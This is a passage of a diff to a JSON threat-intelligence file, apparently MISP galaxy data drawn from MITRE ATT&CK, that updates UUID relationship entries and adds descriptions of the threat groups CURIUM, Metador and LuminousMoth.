- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "24769ab5-14bd-4f4e-a752-cfb185da53ee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "32901740-b42c-4fdd-bc02-345b5dc57082",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "32f49626-87f4-4d6c-8f59-a0dca953fe26",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "359b00ad-9425-420b-bba5-6de8d600cbc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "40f5caa0-4cb7-4117-89fc-d421bb493df3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "4efc3e00-72f2-466a-ab7c-8a7dc6603b19",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "5c747acd-47f0-4c5a-b9e5-213541fc01e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "60b508a1-6a5e-46b1-821a-9f7b78752abf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bd9c723-2f78-4309-82c5-47cad406572b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "899ce53f-13a0-479b-a0e4-67d46e241542",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "revoked-by"
- },
- {
- "dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "979adb5a-dc30-48f0-9e3d-9a26d866928c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "a7881f21-e978-4fe4-af56-92c9416a2616",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "a8839c95-029f-44cf-8f3d-a3cf2039e927",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "b4694861-542c-48ea-9eb1-10d356e7140a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "bf48e7f8-752c-4ce8-bf8f-748edacd8fa6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "c3c8c916-2f3c-4e71-94b2-240bdfc996f0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "e74de37c-a829-446c-937d-56a44f0e9306",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f59508a6-3615-47c3-b493-6676e1a39a87",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f9cc4d06-775f-4ee1-b401-4e2cc0da30ba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "dc5e2999-ca1a-47d4-8d12-a6984b138a1b",
@@ -29051,13 +28182,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"tags": [
@@ -29079,6 +28203,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
"tags": [
@@ -29104,6 +28235,51 @@
"uuid": "94873029-f950-4268-9cfd-5032e15cb182",
"value": "TA551 - G0127"
},
+ {
+ "description": "[CURIUM](https://attack.mitre.org/groups/G1012) is an Iranian threat group first reported in November 2021 that has invested in building a relationship with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note [CURIUM](https://attack.mitre.org/groups/G1012) has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness.(Citation: Microsoft Iranian Threat Actor Trends November 2021)",
+ "meta": {
+ "external_id": "G1012",
+ "refs": [
+ "https://attack.mitre.org/groups/G1012",
+ "https://www.microsoft.com/en-us/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021"
+ ],
+ "synonyms": [
+ "CURIUM"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b1ccd744-3f78-4a0e-9bb2-2002057f7928",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f6ad61ee-65f3-4bd0-a3f5-2f0accb36317",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "3ea7add5-5b8f-45d8-b1f1-905d2729d62a",
+ "value": "CURIUM - G1012"
+ },
{
"description": "[Sidewinder](https://attack.mitre.org/groups/G0121) is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.(Citation: ATT Sidewinder January 2021)(Citation: Securelist APT Trends April 2018)(Citation: Cyble Sidewinder September 2020)",
"meta": {
@@ -29198,6 +28374,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "3dada716-34c3-506e-aa3a-1889bd975b4b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
"tags": [
@@ -29282,6 +28465,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
"tags": [
@@ -29330,13 +28520,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "3dada716-34c3-506e-aa3a-1889bd975b4b",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "3fc023b2-c5cc-481d-9c3e-70141ae1a87e",
@@ -29607,13 +28790,107 @@
"uuid": "afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
"value": "Windshift - G0112"
},
+ {
+ "description": "[Metador](https://attack.mitre.org/groups/G1013) is a suspected cyber espionage group that was first reported in September 2022. [Metador](https://attack.mitre.org/groups/G1013) has targeted a limited number of telecommunication companies, internet service providers, and universities in the Middle East and Africa. Security researchers named the group [Metador](https://attack.mitre.org/groups/G1013) based on the \"I am meta\" string in one of the group's malware samples and the expectation of Spanish-language responses from C2 servers.(Citation: SentinelLabs Metador Sept 2022)",
+ "meta": {
+ "external_id": "G1013",
+ "refs": [
+ "https://assets.sentinelone.com/sentinellabs22/metador#page=1",
+ "https://attack.mitre.org/groups/G1013"
+ ],
+ "synonyms": [
+ "Metador"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "3be1fb7a-0f7e-415e-8e3a-74a80d596e68",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7807d3a4-a885-4639-a786-c1ed41484970",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df350889-4de9-44e5-8cb3-888b8343e97c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "bfc5ddb3-4dfb-4278-8928-020e1b3feddd",
+ "value": "Metador - G1013"
+ },
{
"description": "[Chimera](https://attack.mitre.org/groups/G0114) is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)",
"meta": {
"external_id": "G0114",
"refs": [
"https://attack.mitre.org/groups/G0114",
- "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf",
+ "https://cycraft.com/download/CyCraft-Whitepaper-Chimera_V4.1.pdf",
"https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/"
],
"synonyms": [
@@ -29908,13 +29185,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b4694861-542c-48ea-9eb1-10d356e7140a",
"tags": [
@@ -29985,6 +29255,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -30095,6 +29372,234 @@
"uuid": "99910207-1741-4da1-9b5d-537410186b51",
"value": "Gelsemium - G0141"
},
+ {
+ "description": "[LuminousMoth](https://attack.mitre.org/groups/G1014) is a Chinese-speaking cyber espionage group that has been active since at least October 2020. [LuminousMoth](https://attack.mitre.org/groups/G1014) has targeted high-profile organizations, including government entities, in Myanmar, the Philippines, Thailand, and other parts of Southeast Asia. Some security researchers have concluded there is a connection between [LuminousMoth](https://attack.mitre.org/groups/G1014) and [Mustang Panda](https://attack.mitre.org/groups/G0129) based on similar targeting and TTPs, as well as network infrastructure overlaps.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)",
+ "meta": {
+ "external_id": "G1014",
+ "refs": [
+ "https://attack.mitre.org/groups/G1014",
+ "https://securelist.com/apt-luminousmoth/103332/",
+ "https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited"
+ ],
+ "synonyms": [
+ "LuminousMoth"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "10ffac09-e42d-4f56-ab20-db94c67d76ff",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "19401639-28d0-4c3c-adcc-bc2ba22f6421",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2b742742-28c3-4e1b-bab7-8350d6300fa7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "31fe0ba2-62fd-4fd9-9293-4043d84f7fe9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "32901740-b42c-4fdd-bc02-345b5dc57082",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ee16395-03f0-4690-a32e-69ce9ada0f9e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "64fa0de0-6240-41f4-8638-f4ca7ed528fd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7807d3a4-a885-4639-a786-c1ed41484970",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "84ae8255-b4f4-4237-b5c5-e717405a9701",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "a7881f21-e978-4fe4-af56-92c9416a2616",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "bf1b6176-597c-4600-bfcd-ac989670f96b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "cabe189c-a0e3-4965-a473-dcff00f17213",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "b7f627e2-0817-4cd5-8d50-e75f8aa85cc6",
+ "value": "LuminousMoth - G1014"
+ },
{
"description": "[CostaRicto](https://attack.mitre.org/groups/G0132) is a suspected hacker-for-hire cyber espionage campaign that has targeted multiple industries worldwide since at least 2019. [CostaRicto](https://attack.mitre.org/groups/G0132)'s targets, a large portion of which are financial institutions, are scattered across Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia.(Citation: BlackBerry CostaRicto November 2020)",
"meta": {
@@ -30367,6 +29872,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
"tags": [
@@ -30388,6 +29900,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "132d5b37-aac5-4378-a8dc-3127b18a73dc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "26c87906-d750-42c5-946c-d4162c73fc7b",
"tags": [
@@ -30395,6 +29914,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
"tags": [
@@ -30437,6 +29963,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "7610cada-1499-41a4-b3dd-46467b68d177",
"tags": [
@@ -30458,6 +29991,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "88d31120-5bc7-4ce3-a9c0-7cf147be8e54",
"tags": [
@@ -30465,6 +30005,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
"tags": [
@@ -30486,6 +30033,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "b4694861-542c-48ea-9eb1-10d356e7140a",
"tags": [
@@ -30507,6 +30061,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
"tags": [
@@ -30514,6 +30075,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
@@ -30521,6 +30089,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24",
"tags": [
@@ -30804,6 +30379,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "2d3f5b3c-54ca-4f4d-bb1f-849346d31230",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
"tags": [
@@ -31213,7 +30795,7 @@
"meta": {
"external_id": "G0138",
"refs": [
- "http://download.ahnlab.com/global/brochure/[Analysis]Andariel_Group.pdf",
+ "http://download.ahnlab.com/global/brochure/%5BAnalysis%5DAndariel_Group.pdf",
"http://www.issuemakerslab.com/research3/",
"https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/",
"https://attack.mitre.org/groups/G0138",
@@ -31525,6 +31107,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
